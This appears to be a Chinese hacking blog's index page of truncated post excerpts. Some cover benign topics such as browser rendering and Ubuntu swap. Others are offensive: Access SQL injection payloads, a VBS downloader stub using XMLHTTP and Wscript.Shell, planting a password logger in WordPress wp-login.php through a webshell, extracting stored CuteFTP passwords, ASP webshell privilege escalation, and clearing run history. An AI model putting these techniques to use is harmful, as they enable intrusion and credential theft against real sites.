原创 NC的用法

netcat被譽爲網絡安全界的‘瑞士軍刀’,相信沒有什麼人不認識它吧...... 一個簡單而有用的工具,透過使用TCP或UDP協議的網絡連接去讀寫數據。它被設計成一個穩定的後門工具,能夠直接由其它程序和腳本輕鬆驅動。同時,它也是一個功

原创 mysql中的char函數用法

  CHAR(N,... [USING charset]) CHAR()將每個參數N理解爲一個整數,其返回值爲一個包含這些整數的代碼值所給出的字符的

原创 從CuteFTP的sm.dat中獲取密碼

  CuteFTP PRO的站點信息全部記錄在SM.dat文件裏面 SM.dat的位置 Win98 "X":/WINDOWS/Application Data/GlobalSCAPE/CuteFTP Pro/"Y" Winxp

原创 IDA識別程序中密碼算法插件 FindCrypt2

參見:http://www.openrce.org/downloads/details/189/FindCrypt2一個用於在IDA中識別反彙編後程序

原创 注入過程中的中文處理方法

中文處理方法    在注入中碰到中文字符是常有的事,有些人一碰到中文字符就想打退堂鼓了。其實只要對中文的編碼有所瞭解,“中文恐懼症”很快可以克服。    先說一點常識:    Access中,中文的ASCII碼可能會出現負數,取出該

原创 實戰 SSH 端口轉發

http://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.html 實戰 SSH 端口轉發 通過本文的介紹,讀者可以從中瞭解到如何應用 SSH 端口轉發機制來解

原创 瀏覽器的工作原理:新式網絡瀏覽器幕後揭祕

英文原文鏈接:http://taligarsiel.com/Projects/howbrowserswork1.htm 譯文鏈接:http://www.html5rocks.com/zh/tutorials/internals/howbr

原创 Javascript 裝載和執行

http://coolshell.cn/articles/9749.html 一兩個月前在淘寶內網裏看到一個優化Javascript代碼的競賽,發現有不少的人對Javascript的執行和裝載的基礎並不懂,所以,從那天起我就想寫一篇文章

原创 瀏覽器的渲染原理簡介

http://coolshell.cn/articles/9666.html 看到這個標題大家一定會想到這篇神文《How Browsers Work》,這篇文章把瀏覽器的很多細節講得很細,而且也被翻譯成了中文。爲什麼我還想寫一篇呢?因

原创 ubuntu增加swap空間

用命令free查看系統內 Swap 分區大小。 $free -m                     total        used       free     shared    buffers     cached Mem

原创 ASP WEBSHELL權限總結

文章作者:enterer 博客:www.enterer.cn 我爲什麼會寫這篇文章呢,當然是因爲我很閒(誤)。因爲本人雖然是個菜鳥,學習也就4個多月,但是覺得應該寫些東西和大家交流。本人是提權愛好者,雖然技術一般,但是有耐心些出來和大家

原创 Access SQL注入參考

Access SQL注入參考   描述 SQL查詢及註釋 註釋符 Access中沒有專門的註釋符號.因此"/*", "--"和"#"都沒法使用.但是可以使用空字符"NULL"(%00)代替: ' UNION SELECT 1,1,1

原创 VBS下載者

一、VBS下載者: Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http:

原创 webshell下記錄WordPress登陸密碼

 webshell下記錄Wordpress登陸密碼方便進一步社工 Wordpress的密碼破解可以說基本是沒招了,悲劇只好採用記錄密碼了。 在文件wp-login.php中539行處添加:     // log password   $

原创 How to clear windows run history

http://www.windows-commandline.com/2009/11/how-to-clear-windows-run-history.html Windows stores the list of the comm